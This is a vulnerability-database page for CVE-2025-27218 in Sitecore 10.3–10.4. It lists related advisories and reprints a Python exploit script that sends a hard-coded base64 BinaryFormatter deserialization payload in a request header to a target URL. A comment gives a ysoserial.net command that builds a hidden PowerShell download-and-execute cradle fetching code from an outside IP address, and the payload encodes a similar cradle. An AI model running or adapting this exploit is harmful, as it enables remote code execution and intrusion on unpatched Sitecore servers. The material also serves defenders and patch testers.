📄 Sitecore 10.4 Remote Code Execution

🗓️ 27 Jun 2025 00:00:00Reported by Yesith AlvarezType

Sitecore ten three to ten four exposes remote code execution through CVE-2025-27218.

Reporter	Title	Published	Views	Family All 18
Circl	CVE-2025-27218	20 Feb 202506:41	–	circl
CNNVD	Sitecore Experience Manager和Experience Platform 安全漏洞	20 Feb 202500:00	–	cnnvd
CVE	CVE-2025-27218	20 Feb 202500:00	–	cve
Cvelist	CVE-2025-27218	20 Feb 202500:00	–	cvelist
Exploit DB	Sitecore 10.4 - Remote Code Execution (RCE)	26 Jun 202500:00	–	exploitdb
Hacker One	Mars: insecure deserilize object leads to RCE On Sitecore (CVE-██████████-27218)	12 Apr 202514:39	–	hackerone
Metasploit	Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit	28 Mar 202518:50	–	metasploit
Nuclei	Sitecore Experience Manager (XM)/Experience Platform (XP) 10.4 - Insecure Deserialization	5 Jun 202603:02	–	nuclei
NVD	CVE-2025-27218	20 Feb 202505:15	–	nvd
Packet Storm	Sitecore CVE-2025-27218 BinaryFormatter Deserialization	28 Mar 202500:00	–	packetstorm

# Exploit Title: Sitecore 10.4 - Remote Code Execution (RCE)
    # Exploit Author: Yesith Alvarez
    # Vendor Homepage: https://developers.sitecore.com/downloads
    # Version: Sitecore 10.3 - 10.4
    # CVE : CVE-2025-27218
    # Link: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py
    
    from requests import Request, Session
    import sys
    import base64
    
    
    def title():
        print('''
        
       _______      ________    ___   ___ ___  _____     ___ ______ ___  __  ___  
      / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \____  |__ \/_ |/ _ \ 
     | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) |  / /   ) || | (_) |
     | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ /  / /   / / | |> _ < 
     | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ / /   / /_ | | (_) |
      \_____|   \/   |______|  |____|\___/____|____/    |____/_/   |____||_|\___/ 
                                                                                  
                                                                                  
    [+] Remote Code Execution                                                                                                                                                                                    
    Author: Yesith Alvarez
    Github: https://github.com/yealvarez
    Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
    Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2025-27218/exploit.py
        ''')   
    
    def exploit(url):
    # This payload must be generated externally with ysoserial.net
    # Example:  ./ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe -nop -w hidden -c 'IEX(New-Object Net.WebClient).DownloadString(\"http://34.134.71.169/111.html\")'"
        payload = 'AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA2ApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBb3dZOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUhCdmQyVnljMmhsYkd3dVpYaGxJQzF1YjNBZ0xYY2dhR2xrWkdWdUlDMWpJQ2RKUlZnb1RtVjNMVTlpYW1WamRDQk9aWFF1VjJWaVEyeHBaVzUwS1M1RWIzZHViRzloWkZOMGNtbHVaeWdtY1hWdmREc2dhSFIwY0Rvdkx6RXdMakV3TGpFd0xqRXdMekV4TVM1b2RHMXNYQ2tuSWlCVGRHRnVaR0Z5WkVWeWNtOXlSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJUZEdGdVpHRnlaRTkxZEhCMWRFVnVZMjlrYVc1blBTSjdlRHBPZFd4c2ZTSWdWWE5sY2s1aGJXVTlJaUlnVUdGemMzZHZjbVE5SW50NE9rNTFiR3g5SWlCRWIyMWhhVzQ5SWlJZ1RHOWhaRlZ6WlhKUWNtOW1hV3hsUFNKR1lXeHpaU0lnUm1sc1pVNWhiV1U5SW1OdFpDSWdMejROQ2lBZ0lDQWdJRHd2YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnUEM5elpEcFFjbTlqWlhOelBnMEtJQ0E4TDA5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2k1UFltcGxZM1JKYm5OMFlXNWpaVDROQ2p3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeVBncz0L'
        payload_encoded = payload
        headers = {'Thumbnailsaccesstoken': payload_encoded}
        s = Session()
    
        req = Request('GET', url, headers=headers)
        prepped = req.prepare()
        resp = s.send(prepped, verify=False, timeout=15)
    
        print(prepped.headers)
        print(url)
        print(resp.status_code)
        print(resp.text)
    
    
    if __name__ == '__main__':
        title()
        if len(sys.argv) < 2:
            print('[+] USAGE: python3 %s https://<target_url>\n' % sys.argv[0])
            print('[+] Example: python3 %s https://192.168.0.10\n' % sys.argv[0])
            exit(0)
        else:        
            exploit(sys.argv[1])

27 Jun 2025 00:00Current

8High risk

Vulners AI Score8

CVSS 3.15.3

EPSS0.75678

SSVC